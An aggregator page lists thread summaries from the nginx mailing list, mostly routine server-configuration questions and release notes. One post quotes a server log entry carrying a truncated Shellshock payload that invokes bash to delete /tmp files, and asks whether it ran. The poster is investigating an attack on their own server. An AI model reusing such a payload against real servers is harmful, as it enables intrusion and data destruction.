Quantcast
Channel: Nginx Forum - Nginx Mailing List - English
Browsing all 7229 articles
Browse latest View live
↧

Nginx not spawning both ipv4 and ipv6 workers (7 replies)

I'm in the process of setting up a new server built on ubuntu 16.04 using nginx 1.10.0. The specific issue is that while my new configuration essentially matches my old nginx configuration from an...

View Article


basic question about (1 reply)

I have this server block in a EC2 nginx webserver. server { listen 80 default_server; root /home/a/all; index index.html; location / { try_files $uri $uri/ =404; } } In my idea all the sites that point...

View Article


nginx-1.11.3 (8 replies)

Changes with nginx 1.11.3 26 Jul 2016 *) Change: now the "accept_mutex" directive is turned off by default. *) Feature: now nginx uses EPOLLEXCLUSIVE on Linux. *) Feature: the ngx_stream_geo_module. *)...

View Article

proxy_next_upstream http_404? (2 replies)

We have a backend server throwing a 404 error, so I added the directive proxy_next_upstream error timeout http_404; but that seems to have no effect. Nginx is still performing round robin connections...

View Article

nginx.conf schedule posted for 2016, September 7-9 in Austin, TX (no replies)

Hello all! The NGINX user conference, nginx.conf 2016 is coming soon: September 7-9 @ the Hilton Hotel in Austin, TX. nginx.conf 2016 starts with NGINX experts presenting product roadmaps and technical...

View Article


Would nginx support tcp splicing??? (no replies)

Do they have a develop plan?

View Article

When nginx support tcp splicing? (1 reply)

Do have any plan for tcp splicing?_______________________________________________ nginx mailing list nginx@nginx.org http://mailman.nginx.org/mailman/listinfo/nginx

View Article

nginx not forwarding requests to backend servers. (10 replies)

I am using nginx as a load balancer. However when I type in the URL for my site, which resolves to the IP of the load balancer, I get the default nginx page saying "nginx has been setup more...

View Article


nginx not forwarding requests to backend servers. (3 replies)

I am posting this again because a copy never appeared in my inbox. Please ignore if it was actually delivered to the group already. I am using nginx as a load balancer. However when I type in the URL...

View Article


NGINX and Lumen (Laravel) 5 (7 replies)

Hi, I'm having a frustrating time trying to get Lumen (a.k.a Laravel) working on my NGINX install. At the moment, the best I can get NGINX to give me is 405 errors. Which translates to the following...

View Article

session persistance with IP hash (9 replies)

Running nginx free version 1.10.1-1.el6.ngx.x86_64 on RHEL 6.7. In my conf I am using http { upstream backend { # Use ip hash for session persistance *ip_hash;* server backend1:80; server backend2:80;...

View Article

ngx_stream module build error on 1.11.3 (2 replies)

Hello! I've tried to build nginx 1.11.3 with --with-stream module parameter, but, attached below: ... snip .. ../configure \ --prefix=%{_sysconfdir}/nginx \ --sbin-path=%{_sbindir}/nginx \...

View Article

Access_log off impact on Requests/sec (4 replies)

I am beginning to look at NGINX performance on a development system with traffic driven by Wrk. Initially I am just looking at static HTTP serving. I am using NGINX v1.10.1 running on the host system...

View Article


listening but not connecting (7 replies)

Trying to set up nginx and uwsgi for django. Following the directions here: https://www.digitalocean.com/community/tutorials/how-to-serve-django-applications-with-uwsgi-and-nginx-on-centos-7 netstat...

View Article

Would nginx use multi block device instead of file system (no replies)

use block device directly like ats and squid, and build request offset hash table, should be more effectively? Would nginx support this?

View Article


Accessing library functions from our own nginx module (no replies)

Hi, I am currently writing a dynamic nginx http module which is linked to a static C++ library using the following command: CORE_LIBS="$CORE_LIBS /path/to/static/library.a" I just started using nginx...

View Article

Hierarchy of malformed requests and blocked IPs (1 reply)

_______________________________________________ nginx mailing list nginx@nginx.org http://mailman.nginx.org/mailman/listinfo/nginx

View Article


Auth_digest not working (no replies)

Dear all, I have a very simple webserver running with php-fpm connected (to handle php scripts). It is running perfectly fine without authentication (on a FreeBSD installation). If I enable auth_digest...

View Article

Bash script; Was it executed? (3 replies)

I see a return code of 200. Does that mean this script was executed? ------------- 219.153.48.45 - - [30/Jul/2016:07:40:07 +0000] "GET / HTTP/1.1" 200 643 "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;ech...

View Article

PHP-FPM Integration driving me mad (4 replies)

Hello List, due to a Server move, I was setting up a new nginx installation. Some of the pages need php. So far nothing new. When I start adding SCRIPT_FILENAME to the php location, it ends up that the...

View Article
Browsing all 7229 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>